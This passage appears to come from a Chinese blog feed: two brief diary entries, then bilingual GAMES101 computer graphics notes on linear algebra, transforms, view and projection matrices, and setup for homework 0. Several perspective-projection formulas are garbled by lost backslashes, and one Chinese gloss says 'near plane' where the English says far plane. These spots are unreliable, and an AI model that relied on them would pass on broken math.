    10.28

    jpg

    ​ 出去散步发现校门口外卖起了福鼎肉片,很想买一份尝尝,但是感觉雾霾天的路边摊不太卫生的感觉还是算了。而且感觉做肉片的人五大三粗,一看就很不福建,告辞!

    10.29

    jpg

    ​ 空气质量如图。

    ]]>
    @@ -4285,7 +4285,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%881%EF%BC%89/ - 资源

    课程

    Lecture 01 Overview of Computer Graphics

    What is Computer Graphics?图形学的应用:

    • Video Games 游戏

    • Movies 电影特效

    • Animations 动画

    • Design 设计

    • Visualization 可视化

    • Virtual Reality 虚拟现实

    • Augmented Reality 增强现实

    • Digital Illustration 数字插画

    • Simulation 模拟

    • Graphical User Interfaces, GUI 图形用户界面

    • Typography 字体


    Why study Computer Graphics?

    • Computer Graphics is AWESOME!

    Course Topics(mainly 4 parts)

    • Rasterization 光栅化

      • Project geometry primitives (3D triangles / polygons) onto the screen 将几何图元(三维三角形/多边形)投影到屏幕上
      • Break projected primitives into fragments (pixels) 将投影基元分解为片段(像素)
      • Gold standard in Video Games (Real-time Applications) 视频游戏(实时应用)的黄金标准
    • Curves and Meshes 曲线和网格

      • How to represent geometry in Computer Graphics 如何在计算机图形学中表示几何图形
    • Ray Tracing 光线追踪

      • Shoot rays from the camera through each pixel 从相机经过每个像素发射光线
        • Calculate intersection and shading 计算交点和着色
        • Continue to bounce the rays till they hit light sources 继续反射光线,直到光线碰到光源
        • Gold standard in Animations / Movies (Offline Applications) 动画/电影黄金标准(离线应用程序)
    • Animation / Simulation 动画 / 模拟

      • Key frame Animation 关键帧动画
      • Mass-spring System 弹簧质点系统

    计算机图形学、计算机视觉、数字图像处理的区别:

    png

    Lecture 02 Review of Linear Algebra

    A Swift and Brutal Introduction to Linear Algebra! 一份对线性代数的迅速直接的介绍!

    Graphics’ Dependencies 图形相关的依赖项

    • Basic mathematics 基础数学

      • Linear algebra, calculus, statistics 线性代数、微积分、统计学
    • Basic physics 基础物理学

      • Optics, Mechanics 光学、力学
    • Misc 杂项

      • Signal processing 信号处理

      • Numerical analysis 数值分析

    • And a bit of aesthetics 还有一点美学

    This Course

    • More dependent on Linear Algebra 更多依赖于线性代数
      • Vectors (dot products, cross products, …) 向量(点积、叉积等)
      • Matrices (matrix-matrix, matrix-vector mult., …) 矩阵(矩阵相乘、矩阵与向量相乘等)
    • For example,
      • A point is a vector? 一个点是一个向量吗?
      • An operation like translating or rotating objects can be matrix-vector multiplication 类似平移或旋转物体的操作可以通过矩阵与向量相乘实现

    Vectors

    • 通常被写作 $\vec{a}$ 或 $\boldsymbol{a}$

    • 向量的长度被写作 $\left|\left|\vec{a}\right|\right|$

    • 向量的归一化,方向不变,长度设为 1:$\hat{a}=\vec{a}/|\vec{a}|$

    Cartesian Coordinates 笛卡尔坐标系

    $$\mathbf{A}=\begin{pmatrix}x\\y\end{pmatrix}$$

    $$\mathbf{A}^T=(x,y)$$

    $$\|\mathbf{A}\|=\sqrt{x^2+y^2}$$

    Dot (scalar) Product 向量点乘

    $$\vec{a}\cdot\vec{b}=|\vec{a}||\vec{b}|\cos\theta $$

    $$\begin{aligned}\cos\theta&=\frac{\vec a\cdot\vec b}{|\vec a||\vec b|}\end{aligned}$$

    对于 Unit Vectors 单位向量:

    $$\cos\theta=\hat{a}\cdot\hat{b}$$

    性质:

    交换律:$\vec{a}\cdot\vec{b}=\vec{b}\cdot\vec{a}$

    分配律:$\vec{a}\cdot(\vec{b}+\vec{c})=\vec{a}\cdot\vec{b}+\vec{a}\cdot\vec{c}$

    结合律:$(k\vec{a})\cdot\vec{b}=\vec{a}\cdot(k\vec{b})=k(\vec{a}\cdot\vec{b})$

    Dot Product in Cartesian Coordinates 笛卡尔坐标系下的向量点乘

    Component-wise multiplication, then adding up 分量逐个相乘,然后求和

    • In 2D

      • $\vec{a}\cdot\vec{b}=\begin{pmatrix}x_a\\y_a\end{pmatrix}\cdot\begin{pmatrix}x_b\\y_b\end{pmatrix}=x_ax_b+y_ay_b$
    • In 3D

      • $\vec a\cdot\vec b=\begin{pmatrix}x_a\\y_a\\z_a\end{pmatrix}\cdot\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}=x_ax_b+y_ay_b+z_az_b$

    Dot Product in Graphics 向量点乘在图形学中的应用

    • Find angle between two vectors (e.g. cosine of angle between light source and surface) 寻找两个向量之间的夹角,例如光源和表面之间的夹角的余弦值。

    • Finding projection of one vector on another 找到一个向量在另一个向量上的投影。

      • $\vec{b}_{\perp}$:$\vec{b}$ 在 $\vec{a}$ 方向上的投影(见本列表后的示例)。
        • $\vec{b}_{\perp}$ 必须与 $\vec{a}$(或 $\hat{a}$)平行。
          • $\vec{b}_{\perp}=k\hat{a},\quad k=\|\vec{b}_{\perp}\|=\|\vec{b}\|\cos\theta$
    • Measure how close two directions are 测量两个方向之间的接近程度

    • Decompose a vector 分解一个向量

    • Determine forward / backward 确定正向/反向

    Cross (vector) Product 矢量积

    png

    • Cross product is orthogonal to two initial vectors 叉乘结果与两个初始向量垂直
    • Direction determined by right-hand rule 方向由右手定则确定
    • Useful in constructing coordinate systems (later) 在构建坐标系时非常有用

    性质:

    对于右手坐标系:

    $$\vec{x}\times\vec{y}=+\vec{z}$$

    $$\vec{y}\times\vec{x}=-\vec{z}$$

    $$\vec{y}\times\vec{z}=+\vec{x}$$

    $$\vec{z}\times\vec{y}=-\vec{x}$$

    $$\vec{z}\times\vec{x}=+\vec{y}$$

    $$\vec{x}\times\vec{z}=-\vec{y}$$

    不满足交换律:$\vec{a}\times\vec{b}=-\vec{b}\times\vec{a}$

    跟自身叉乘为零向量:$\vec{a}\times\vec{a}=\vec{0}$

    满足分配律:

    $\vec{a}\times(\vec{b}+\vec{c})=\vec{a}\times\vec{b}+\vec{a}\times\vec{c}$

    $\vec{a}\times(k\vec{b})=k(\vec{a}\times\vec{b})$

    Cross Product: Cartesian Formula? 矢量积在笛卡尔坐标系中

    $$\vec{a}\times\vec{b}=\begin{pmatrix}y_az_b-y_bz_a\\z_ax_b-x_az_b\\x_ay_b-y_ax_b\end{pmatrix}$$

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\\z_a&0&-x_a\\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}$$

    $A^*$ 是 $\vec{a}$ 对应的反对称(对偶)矩阵(参见:伴随矩阵 - 维基百科,自由的百科全书 (wikipedia.org))。
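
    A quick numpy check that this skew-symmetric (dual) matrix reproduces the cross product (names are illustrative):

    import numpy as np

    def dual_matrix(a):
        # A* such that A* @ b == np.cross(a, b)
        return np.array([[0, -a[2], a[1]],
                         [a[2], 0, -a[0]],
                         [-a[1], a[0], 0]], dtype=float)

    a, b = np.array([1.0, 2.0, 3.0]), np.array([4.0, 5.0, 6.0])
    print(np.allclose(dual_matrix(a) @ b, np.cross(a, b)))   # True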

    Cross Product in Graphics 矢量积在图形学中的应用

    • Determine left / right 判别左右
    • Determine inside / outside 判别内外

    Orthonormal Bases / Coordinate Frames 正交基 / 坐标系

    构建右手坐标系:

    $$|\vec{u}|=|\vec{v}|=|\vec{w}|=1$$

    $$\vec{u}\cdot\vec{v}=\vec{v}\cdot\vec{w}=\vec{u}\cdot\vec{w}=0$$

    $$\vec{w}=\vec{u}\times\vec{v}$$

    $$\vec p=(\vec p\cdot\vec u)\vec u+(\vec p\cdot\vec v)\vec v+(\vec p\cdot\vec w)\vec w$$
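
    A minimal numpy sketch of building such a right-handed frame from a view direction and an approximate up vector (this particular construction order is one common choice, not the only one):

    import numpy as np

    def make_frame(w_dir, up):
        # returns an orthonormal right-handed basis (u, v, w) with w = u x v
        w = w_dir / np.linalg.norm(w_dir)
        u = np.cross(up, w)
        u = u / np.linalg.norm(u)
        v = np.cross(w, u)
        return u, v, w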

    Matrix 矩阵

    Matrix-Matrix Multiplication 矩阵乘法

    一般不满足交换律(即通常 $AB\ne BA$)

    满足结合律和分配律:

    • $(AB)C=A(BC)$
    • $A(B+C)=AB+AC$
    • $(A+B)C=AC+BC$

    $$(AB)^T=B^TA^T$$

    Identity Matrix 单位矩阵

    $$I_{3\times3}=\begin{pmatrix}1&0&0\\0&1&0\\0&0&1\end{pmatrix}$$

    $$AA^{-1}=A^{-1}A=I$$

    $$(AB)^{-1}=B^{-1}A^{-1}$$

    Vector multiplication in Matrix form 向量与矩阵相乘

    • Dot product 点乘

    $$\vec{a}\cdot\vec{b}=\vec{a}^T\vec{b}$$

    $$=\begin{pmatrix}x_a&y_a&z_a\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}=\begin{pmatrix}x_ax_b+y_ay_b+z_az_b\end{pmatrix}$$

    • Cross product 叉乘

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\\z_a&0&-x_a\\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\\y_b\\z_b\end{pmatrix}$$

    Lecture 03 Transformation

    2D Transform 二维变换

    Scale Transform 缩放

    等比缩放:

    $$x^{\prime}=sx$$

    $$y^{\prime}=sy$$

    用矩阵乘法表示:

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}s&0\\0&s\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Scale (Non-Uniform) 任意缩放

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}s_x&0\\0&s_y\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Reflection Matrix 镜像

    Horizontal reflection 水平镜像:

    $$x^{\prime}=-x$$

    $$y^{\prime}=y$$

    用矩阵乘法表示:

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}-1&0\\0&1\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Shear Matrix 斜切:

    png

    Hints:

    • Horizontal shift is $0$ at $y=0$
    • Horizontal shift is $a$ at $y=1$
    • Vertical shift is always $0$

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}1&a\\0&1\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    Rotation Matrix 旋转

    $$\mathbf{R}_\theta=\begin{bmatrix}\cos\theta&-\sin\theta\\\sin\theta&\cos\theta\end{bmatrix}$$

    旋转 $-\theta$ 对应的矩阵等于原矩阵的逆,也等于原矩阵的转置:

    旋转矩阵是正交矩阵。

    $$\mathbf{R}_{-\theta}=\mathbf{R}_{\theta}^{-1}=\mathbf{R}_{\theta}^{T}$$
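
    A one-line numerical check of this orthogonality property:

    import numpy as np

    theta = 0.3
    R = np.array([[np.cos(theta), -np.sin(theta)],
                  [np.sin(theta),  np.cos(theta)]])
    print(np.allclose(np.linalg.inv(R), R.T))   # True: inverse == transpose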

    Linear Transforms = Matrices 线性变换 = 矩阵

    $$x^{\prime}=ax+by$$

    $$y^{\prime}=cx+dy$$

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}a&b\\c&d\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}$$

    简写为:

    $$\mathbf{x}^{\prime}=\mathbf{M}\mathbf{x}$$

    Translation 平移

    $$x^{\prime}=x+t_x$$

    $$y^{\prime}=y+t_y$$

    Why Homogeneous Coordinates 为什么引入齐次坐标

    • Translation cannot be represented in matrix form 平移变换不能用矩阵来表示

    $$\begin{bmatrix}x'\\y'\end{bmatrix}=\begin{bmatrix}a&b\\c&d\end{bmatrix}\begin{bmatrix}x\\y\end{bmatrix}+\begin{bmatrix}t_x\\t_y\end{bmatrix}$$

    因此,平移变换不是线性变换!

    • But we don’t want translation to be a special case 但我们不希望平移变换成为特例

    • Is there a unified way to represent all transformations? (and what’s the cost?) 用统一的方式描述所有变换?(代价是什么?)

    Solution: Homogenous Coordinates 解决办法:齐次坐标

    Add a third coordinate (w-coordinate) 增加一个维度

    • 2D point = $(x, y, {\color{Red}1})^T$
    • 2D vector = $(x, y, {\color{Red}0})^T$

    Matrix representation of translations 平移的矩阵表示

    $$\begin{pmatrix}x'\\y'\\w'\end{pmatrix}=\begin{pmatrix}1&0&t_x\\0&1&t_y\\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}=\begin{pmatrix}x+t_x\\y+t_y\\1\end{pmatrix}$$

    Valid operation if w-coordinate of result is 1 or 0 当结果的 w 坐标为 1 或 0 时,运算才是合法的,这是因为:

    • vector + vector = vector
    • point – point = vector
    • point + vector = point
    • point + point = 它们的中点

    因此定义,在齐次坐标中:

    $$\begin{pmatrix}x\\y\\w\end{pmatrix}\text{ is the 2D point }\begin{pmatrix}x/w\\y/w\\1\end{pmatrix},\quad w\neq0$$
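
    A small numpy illustration of why the w component matters: the same translation matrix moves a point (w = 1) but leaves a vector (w = 0) unchanged:

    import numpy as np

    T = np.array([[1, 0, 2],   # translate by (2, 3)
                  [0, 1, 3],
                  [0, 0, 1]], dtype=float)

    point  = np.array([1.0, 1.0, 1.0])   # w = 1
    vector = np.array([1.0, 1.0, 0.0])   # w = 0

    print(T @ point)    # [3. 4. 1.] -- translated
    print(T @ vector)   # [1. 1. 0.] -- unchanged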

    Affine Transformation 仿射变换

    Affine map = linear map + translation 仿射变换 = 线性变换 + 平移

    $$\begin{pmatrix}x^{\prime}\\y^{\prime}\end{pmatrix}=\begin{pmatrix}a&b\\c&d\end{pmatrix}\cdot\begin{pmatrix}x\\y\end{pmatrix}+\begin{pmatrix}t_x\\t_y\end{pmatrix}$$

    Using homogenous coordinates: 使用齐次坐标

    $$\begin{pmatrix}x'\\y'\\1\end{pmatrix}=\begin{pmatrix}a&b&t_x\\c&d&t_y\\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}$$

    2D Transformations 2D 变换

    Scale 缩放

    $$\mathbf{S}(s_x,s_y)=\begin{pmatrix}s_x&0&0\\0&s_y&0\\0&0&1\end{pmatrix}$$

    Rotation 旋转

    $$\mathbf{R}(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0\\\sin\alpha&\cos\alpha&0\\0&0&1\end{pmatrix}$$

    Translation 平移

    $$\mathbf{T}(t_x,t_y)=\begin{pmatrix}1&0&t_x\\0&1&t_y\\0&0&1\end{pmatrix}$$

    Inverse Transform 逆变换

    $$\mathbf{M^{-1}}$$

    Composing Transforms 复合变换

    Sequence of affine transforms $A_1, A_2, A_3, …$ 对于仿射变换序列 $A_1, A_2, A_3, …$

    • Compose by matrix multiplication 通过矩阵乘法进行合成
      • Very important for performance! 对性能非常重要!

    $$A_n(\ldots A_2(A_1(\mathbf{x})))=\mathbf{A}_n\cdots\mathbf{A}_2\cdot\mathbf{A}_1\cdot\begin{pmatrix}x\\y\\1\end{pmatrix}$$

    预乘 $n$ 个矩阵以获得表示组合变换的单个矩阵。

    Decomposing Complex Transforms 分解复合变换

    png

    How to rotate around a given point $c$? 如何绕空间任意一点 $c$ 旋转?

    1. Translate center to origin 将旋转中心平移到原点
    2. Rotate 旋转
    3. Translate back 平移回去

    $$\mathbf{T}(\mathbf{c})\cdot\mathbf{R}(\alpha)\cdot\mathbf{T}(-\mathbf{c})$$
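
    A minimal numpy sketch of this compose-around-a-point recipe in 2D homogeneous coordinates (function names are illustrative):

    import numpy as np

    def T(tx, ty):
        return np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]], dtype=float)

    def R(alpha):
        c, s = np.cos(alpha), np.sin(alpha)
        return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]], dtype=float)

    def rotate_about(c, alpha):
        # translate c to the origin, rotate, translate back
        return T(c[0], c[1]) @ R(alpha) @ T(-c[0], -c[1])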

    3D Transforms

    Use homogeneous coordinates again 再次使用齐次坐标:

    • 3D point = $(x, y, z, {\color{Red}1})^T$
    • 3D vector = $(x, y, z, {\color{Red}0})^T$

    In general, $(x, y, z, w) (w \ne 0)$ is the 3D point:

    $$(x/w, y/w, z/w)$$

    3D Transformations 3D 变换

    Use $4\times 4$ matrices for affine transformations 使用 $4\times 4$ 齐次坐标表示:

    $$\begin{pmatrix}x'\\y'\\z'\\1\end{pmatrix}=\begin{pmatrix}a&b&c&t_x\\d&e&f&t_y\\g&h&i&t_z\\0&0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\\y\\z\\1\end{pmatrix}$$

    先应用线性变换,再平移。

    Lecture 04 Transformation Cont.

    Viewing (观测) transformation

    • View (视图) / Camera transformation
    • Projection (投影) transformation
    • Orthographic (正交) projection
    • Perspective (透视) projection

    3D Transformations 3D 变换

    Rotation around $x$-, $y$-, or $z$-axis 沿 $x$、$y$、$z$ 轴旋转:

    png

    $$\mathbf{R}_x(\alpha)=\begin{pmatrix}1&0&0&0\\0&\cos\alpha&-\sin\alpha&0\\0&\sin\alpha&\cos\alpha&0\\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_y(\alpha)=\begin{pmatrix}\cos\alpha&0&\sin\alpha&0\\0&1&0&0\\-\sin\alpha&0&\cos\alpha&0\\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\\sin\alpha&\cos\alpha&0&0\\0&0&1&0\\0&0&0&1\end{pmatrix}$$

    Compose any 3D rotation from $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$? 用 $\mathbf{R}_x$、$\mathbf{R}_y$、$\mathbf{R}_z$ 组合出任意三维旋转?

    $$\mathbf{R}_{xyz}(\alpha,\beta,\gamma)=\mathbf{R}_x(\alpha)\mathbf{R}_y(\beta)\mathbf{R}_z(\gamma)$$

    • So-called Euler angles 所谓的欧拉角
    • Often used in flight simulators: roll, pitch, yaw 常用于飞行模拟器:滚转、俯仰、偏航

    png

    Rodrigues’ Rotation Formula 罗德里格斯旋转公式

    绕轴 $n(n_x,n_y, n_z)$ 旋转角度 $\alpha$:

    $$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\\n_z&0&-n_x\\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$
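
    A direct numpy transcription of the formula (assuming n is a unit axis and alpha is in radians):

    import numpy as np

    def rodrigues(n, alpha):
        # rotation by alpha about the unit axis n = (nx, ny, nz)
        n = np.asarray(n, dtype=float)
        N = np.array([[0, -n[2], n[1]],
                      [n[2], 0, -n[0]],
                      [-n[1], n[0], 0]])
        return (np.cos(alpha) * np.eye(3)
                + (1 - np.cos(alpha)) * np.outer(n, n)
                + np.sin(alpha) * N)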

    View / Camera Transformation 视图变换

    • What is view transformation? 什么是视图变换?
    • Think about how to take a photo 考虑拍照
      • Find a good place and arrange people (model transformation) 摆好场景:模型变换
      • Find a good “angle” to put the camera (view transformation) 选好视角:视图变换
      • Cheese! (projection transformation) 拍照:投影变换
    • How to perform view transformation? 如何进行视图变换?
      • Define the camera first 首先定义一个相机
        • Position 位置 $\vec{e}$
        • Look-at / gaze direction 注视/凝视方向 $\hat g$
        • Up direction 上方向 $\hat t$

    png

    • Key observation 重点观察

      • If the camera and all objects move together, the “photo” will be the same 如果相机和所有物体一起移动,“照片”将是相同的
    • How about that we always transform the camera to 不如我们总是把相机变换到

      • The origin, up at $Y$, look at $-Z$ 处于原点,上方为 $Y$ 轴,看着 $-Z$ 轴方向
      • And transform the objects along with the camera 并随相机变换对象
    • Transform the camera by $M_{view}$

    • So it’s located at the origin, up at $Y$, look at $-Z$ 这样它就位于原点,上方向为 $Y$ 轴,看向 $-Z$ 方向

    • $M_{view}$ in math? $M_{view}=R_{view}T_{view}$

      • Translates $e$ to origin

        $T_{view}=\begin{bmatrix}1&0&0&-x_e\\0&1&0&-y_e\\0&0&1&-z_e\\0&0&0&1\end{bmatrix}$

      • Rotates $g$ to $-Z$、Rotates $t$ to $Y$、Rotates ($g \times t$) To $X$

        • Difficult to write! 将 $g$ 旋转到 $-Z$ 轴、将 $t$ 旋转到 $Y$ 轴、将 ($g \times t$) 旋转到 $X$ 轴,描述成矩阵是很复杂的!

        • 考虑求其逆变换

          $R_{view}^{-1}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&x_{t}&x_{-g}&0\\y_{\hat{g}\times\hat{t}}&y_{t}&y_{-g}&0\\z_{\hat{g}\times\hat{t}}&z_{t}&z_{-g}&0\\0&0&0&1\end{bmatrix}$

        • 由于旋转矩阵是正交矩阵,其逆为它的转置,因此易求得 $R_{view}$

          $R_{view}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&y_{\hat{g}\times\hat{t}}&z_{\hat{g}\times\hat{t}}&0\\x_t&y_t&z_t&0\\x_{-g}&y_{-g}&z_{-g}&0\\0&0&0&1\end{bmatrix}$

    • Summary 总结

      • Transform objects together with the camera 与摄影机一起变换对象
      • Until camera’s at the origin, up at $Y$, look at $-Z$ 直到相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向。
    • Also known as ModelView Transformation 也称为 ModelView 变换
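
    A minimal numpy sketch of $M_{view}=R_{view}T_{view}$ as derived above (assuming $\hat g$ and $\hat t$ are already unit length and perpendicular; the function name is illustrative):

    import numpy as np

    def view_matrix(e, g, t):
        # e: eye position, g: unit gaze direction, t: unit up direction
        gxt = np.cross(g, t)
        R = np.eye(4)
        R[0, :3], R[1, :3], R[2, :3] = gxt, t, -g   # rows of R_view
        T = np.eye(4)
        T[:3, 3] = -np.asarray(e, dtype=float)      # T_view: move e to the origin
        return R @ T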

    Projection Transformation 投影变换

    • Projection in Computer Graphics 投影在计算机图形学
      • 3D to 2D
      • Orthographic projection 正交投影
      • Perspective projection 透视投影

    png

    Orthographic Projection 正交投影

    • A simple way of understanding 简单的理解方法

      • Camera located at origin, looking at $-Z$, up at $Y$ (looks familiar?) 相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向
      • Drop $Z$ coordinate 删除 $Z$ 坐标
      • Translate and scale the resulting rectangle to $[-1, 1]^2$ 将生成的矩形平移并缩放到 $[-1,1]^2$
    • In General

      • We want to map a cuboid $[l, r]\times [b, t]\times [f, n]$ to the “canonical” cube $[-1, 1]^3$

        我们想把长方体 $[l,r]\times[b,t]\times[f,n]$ 映射到“规范(canonical,也译作正则、标准)”立方体 $[-1,1]^3$

    • Slightly different orders (to the “simple way”)

      • Center cuboid by translating 通过平移使长方体居中
      • Scale into “canonical” cube 缩放为“规范”立方体

    $r,l,t,b,n,f$ 的定义如下所示:

    $x$ 轴坐标范围:$[l,r]$

    $y$ 轴坐标范围:$[b,t]$

    $z$ 轴坐标范围:$[f,n]$

    png

    • Transformation matrix?

      • Translate (center to origin) first, then scale (length/width/height to 2) 首先平移(中心到原点)然后缩放(长度/宽度/高度到 2)

        $M_{ortho}=\begin{bmatrix}\frac{2}{r-l}&0&0&0\\0&\frac{2}{t-b}&0&0\\0&0&\frac{2}{n-f}&0\\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}{2}\\0&1&0&-\frac{t+b}{2}\\0&0&1&-\frac{n+f}{2}\\0&0&0&1\end{bmatrix}$

    • Caveat 警告

      • Looking at / along $-Z$ is making near and far not intuitive ($n > f$) 沿 $-Z$ 方向观察,使得“近”“远”不太直观($n>f$)
        • $n$ 和 $f$ 都是负数,且 $|f|>|n|$。
      • FYI: that’s why OpenGL (a Graphics API) uses left hand coords. 仅供参考:这就是 OpenGL(图形 API)使用左手坐标的原因。
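
    A direct numpy transcription of the $M_{ortho}$ above (scale after translation; all six bounds are signed coordinates, so $n > f$ when looking along $-Z$):

    import numpy as np

    def ortho(l, r, b, t, n, f):
        # translate the cuboid's centre to the origin, then scale to [-1, 1]^3
        scale = np.diag([2 / (r - l), 2 / (t - b), 2 / (n - f), 1.0])
        trans = np.eye(4)
        trans[:3, 3] = [-(r + l) / 2, -(t + b) / 2, -(n + f) / 2]
        return scale @ trans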

    Perspective Projection 透视投影

    • Most common in Computer Graphics, art, visual system 最常见于计算机图形学、艺术、视觉系统
    • Farther objects are smaller 越远的物体越小
    • Parallel lines not parallel; converge to single point 平行线不平行;收敛到单点

    png

    • How to do perspective projection 如何进行透视投影

      • First “squish” the frustum into a cuboid ($n \to n$, $f \to f$) ($M_{persp\to ortho}$)

        首先将截头体“压扁”成长方体($n\to n$,$f\to f$)($M_{persp\to ortho}$)

      • Do orthographic projection ($M_{ortho}$, already known!) 做正交投影($M_{ortho}$,已经知道了!)

    png

    • In order to find a transformation 为了找到变换(推导出矩阵 $M_{persp\to ortho}$)

      • Recall the key idea: Find the relationship between transformed points $(x’, y’,z’)$ and the original points $(x, y, z)$

        回想关键思想:找到转换之间的关系点 $(x’, y’,z’)$ 和原始点 $(x, y, z)$

        $y^{\prime}=\frac{n}{z}y$

        $x^{\prime}=\frac{n}{z}x$

    png

    • In homogeneous coordinates, 齐次坐标下,

      $\begin{pmatrix}x\\y\\z\\1\end{pmatrix}\Rightarrow\begin{pmatrix}nx/z\\ny/z\\\text{unknown}\\1\end{pmatrix}==\begin{pmatrix}nx\\ny\\\text{still unknown}\\z\end{pmatrix}$

    • So the “squish” (persp to ortho) projection does this 所以“挤压”(透视到正交)投影可以做到这一点

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\\y\\z\\1\end{pmatrix}=\begin{pmatrix}nx\\ny\\\text{unknown}\\z\end{pmatrix}$

    • Already good enough to figure out part of $M_{persp\to ortho}$ 可以求得 $M_{persp\to ortho}$ 的一部分:

      $M_{persp\to ortho}=\begin{pmatrix}n&0&0&0\\0&n&0&0\\?&?&?&?\\0&0&1&0\end{pmatrix}$

    • Observation: the third row is responsible for $z’$ 观察:第三排负责 $z’$

      • Any point on the near plane will not change 近平面上的任何点都不会改变

      • Any point’s z on the far plane will not change 远平面上的任何点的 $z$ 都不会改变

    • Any point on the near plane will not change 近平面上的任何点都不会改变

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\y\z\1\end{pmatrix}=\begin{pmatrix}nx\ny\\text{unknown}\z\end{pmatrix}\overset{\text{replace z with n}}{\operatorname*{\to}}\begin{pmatrix}x\y\n\1\end{pmatrix}\Rightarrow\begin{pmatrix}x\y\n\1\end{pmatrix}==\begin{pmatrix}nx\ny\n^2\n\end{pmatrix}$

    • So the third row must be of the form $(0\ 0\ A\ B)$ 所以第三行的形式必须是$(0\ 0\ A\ B)$

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2$

    • What do we have now?

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2\to An+B=n^2$

    • Any point’s z on the far plane will not change 近平面上的任何点都不会改变

      $\begin{pmatrix}0\0\f\1\end{pmatrix}\Rightarrow\begin{pmatrix}0\0\f\1\end{pmatrix}==\begin{pmatrix}0\0\f^2\f\end{pmatrix}\quad\to\quad Af+B=f^2$

    • Solve for $A$ and $B$

      $\begin{aligned}An+B&=n2\Af+B&=f2\end{aligned}\quad\to\quad\begin{aligned}A&=n+f\B&=-nf\end{aligned}$

    • Finally, every entry in $M_{persp\to ortho}$ is known!

    • What’s next?

      • 完成正交投影($M_{ortho}$)
      • $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    HW0

    环境配置

    WSL2 下:

    sudo apt-get install xfce4-terminal
    sudo apt-get install xfce4

    配置环境变量:

    echo "export DISPLAY=localhost:0">> ~/.bashrc

    MobaXterm 下配置 wsl2:

    png

    开跑!

    png

    安装库:

    sudo apt update
    sudo apt install g++ gdb cmake
    sudo apt install libopencv-dev libeigen3-dev
    sudo apt install libglu1-mesa-dev freeglut3-dev mesa-common-dev xorg-dev

    Windows 下的 VSCode,安装 wsl 插件,点击左下角,连接 wsl。

    png

    打开作业模板,有如下命令:

    • mkdir build: 创建名为 build 的文件夹。
    • cd build: 移动到 build 文件夹下。
    • cmake ..: 注意其中 ’…’ 表示上一级目录,若为 ’.’ 则表示当前目录。
    • make: 编译程序,错误提示会显示在终端中。
    • ./Transformation:若上一步无错误,则可运行程序(这里 Transformation 为可执行文件名,可参照 CMakeLists.txt 中修改)。

    写一个 compile.sh 便于编译:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make
    ./Transformation
    cd ../

    修改权限:

    chmod a+x compile.sh

    开跑!

    sh compile.sh

    作业

    写一个用于的 sh:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make -j4
    cd ../

    示例代码

    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>

    int main(){

    // Basic Example of cpp
    std::cout << "Example of cpp \n";
    float a = 1.0, b = 2.0;
    std::cout << a << std::endl;
    std::cout << a/b << std::endl;
    std::cout << std::sqrt(b) << std::endl;
    std::cout << std::acos(-1) << std::endl;
    std::cout << std::sin(30.0/180.0*acos(-1)) << std::endl;

    // Example of vector
    std::cout << "Example of vector \n";
    // vector definition
    Eigen::Vector3f v(1.0f,2.0f,3.0f);
    Eigen::Vector3f w(1.0f,0.0f,0.0f);
    // vector output
    std::cout << "Example of output \n";
    std::cout << v << std::endl;
    // vector add
    std::cout << "Example of add \n";
    std::cout << v + w << std::endl;
    // vector scalar multiply
    std::cout << "Example of scalar multiply \n";
    std::cout << v * 3.0f << std::endl;
    std::cout << 2.0f * v << std::endl;

    // Example of matrix
    std::cout << "Example of matrix \n";
    // matrix definition
    Eigen::Matrix3f i,j;
